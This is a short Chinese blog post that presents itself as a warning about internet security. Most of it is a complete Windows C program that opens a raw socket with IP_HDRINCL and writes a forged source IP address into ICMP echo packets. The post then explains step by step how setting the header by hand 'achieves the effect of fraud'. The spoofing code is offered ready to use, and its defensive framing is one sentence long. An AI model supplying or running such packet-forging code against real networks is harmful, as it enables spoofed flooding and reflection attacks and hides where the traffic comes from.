整理这个资料,目的就是告诉大家不论钓鱼网站也好,还是IP欺诈也好,网络安全已经成为互联网进一步进入我们生活的主要制约。由于安全因素,我们只能用互联网做一些无关紧要的事情。
冒用别人ip发送icmp报文,原理:自己手动填充IP原地址。It about raw socket:
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#define ICMP_ECHO 8
typedef struct iphdr {
unsigned char verlen; // length and version of the header
unsigned char tos; // Type of service
unsigned short total_len; // total length of the packet
unsigned short ident; // unique identifier
unsigned short frag_and_flags; // flags
unsigned char ttl;
unsigned char proto; // protocol (TCP, UDP etc)
unsigned short checksum; // IP checksum
unsigned int sourceIP;
unsigned int destIP;
} IPHDR;
typedef struct icmphdr {
BYTE i_type;
BYTE i_code; // type sub code
USHORT i_cksum;
USHORT i_id;
USHORT i_seq;
} ICMPHDR;
unsigned short cal_checksum( unsigned short *buf, int size);
void main()
{
SOCKET s;
WSADATA WSAData;
BOOL bIphdrIncl;
int iRtn;
IPHDR *pIphdr;
ICMPHDR *pIcmphdr;
unsigned long *pIcmpdata;
char buf[1024];
struct sockaddr_in dest;
if ( WSAStartup( MAKEWORD( 2, 2), &WSAData)) {
printf( "fail to start up winsock./n");
return;
}
// create a raw socket to send fake ICMP_ECHO message ...
s = socket( AF_INET, SOCK_RAW, IPPROTO_IP);
if ( s == INVALID_SOCKET) {
printf( "socket error./n");
return;
}
bIphdrIncl = TRUE;
iRtn =
setsockopt( s, IPPROTO_IP, IP_HDRINCL, (const char *)&bIphdrIncl, sizeof(BOOL));
if ( iRtn) {
printf( "fail to set sock option./n");
return;
}
// fill in ip header ...
pIphdr = (IPHDR *)buf;
pIphdr->verlen = 0x45;
pIphdr->tos = 0;
pIphdr->total_len = sizeof( IPHDR) + sizeof( ICMPHDR) + sizeof( unsigned long);
pIphdr->ident = htons(0);
pIphdr->frag_and_flags = htons(0);
pIphdr->ttl = 255;
pIphdr->proto = IPPROTO_ICMP;
pIphdr->sourceIP = inet_addr( "192.168.5.52"); //your IP
pIphdr->destIP = inet_addr( "192.168.4.55"); //other IP
/*这是最重要的部分,手动对IP进行替换*/
pIphdr->checksum = 0; // ip checksum is set to 0 temperarily.
// fill in icmp header ...
pIcmphdr = (ICMPHDR *)(buf + sizeof( IPHDR));
pIcmphdr->i_type = ICMP_ECHO;
pIcmphdr->i_code = 0;
pIcmphdr->i_cksum = 0;
pIcmphdr->i_id = ( unsigned short)GetCurrentProcessId();
pIcmphdr->i_seq = 0;
// fill in icmp data ...
pIcmpdata = ( unsigned long *)(buf + sizeof( IPHDR) + sizeof( ICMPHDR));
*pIcmpdata = GetTickCount();
// calculate icmp check sum ...
pIcmphdr->i_cksum = cal_checksum( (unsigned short *)pIcmphdr, sizeof(ICMPHDR) + sizeof(unsigned long));
// calculate ip check sum ...
pIphdr->checksum = cal_checksum( (unsigned short *)pIphdr, pIphdr->total_len);
dest.sin_addr.S_un.S_addr = inet_addr( "192.168.4.55");
dest.sin_family = AF_INET;
iRtn =
sendto( s, buf, pIphdr->total_len, 0, (const SOCKADDR *)&dest, sizeof( dest));
if ( iRtn == SOCKET_ERROR) {
printf( "fail to send raw ip packet to destination./n");
return;
} else {
printf( "success./n");
}
closesocket( s);
WSACleanup();
}
unsigned short cal_checksum( unsigned short *buf, int size)
{
unsigned long cksum = 0;
while( size > 1) {
cksum += *buf++;
size -= sizeof( unsigned short);
}
if(size) {
cksum += *( unsigned char *)buf;
}
cksum = ( cksum >> 16) + ( cksum & 0xffff);
cksum += (cksum >>16);
return ( unsigned short)(~cksum);
}
先生成一个raw socket
// create a raw socket to send fake ICMP_ECHO message ...
s = socket( AF_INET, SOCK_RAW, IPPROTO_IP);
再调用setsockopt设置需要自己填写ip头,这样才可以填写源地址,起到欺诈的作用。
bIphdrIncl = TRUE;
setsockopt( s, IPPROTO_IP, IP_HDRINCL, (const char *)&bIphdrIncl, sizeof(BOOL));
后面就是按ip报文格式填写。
37万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
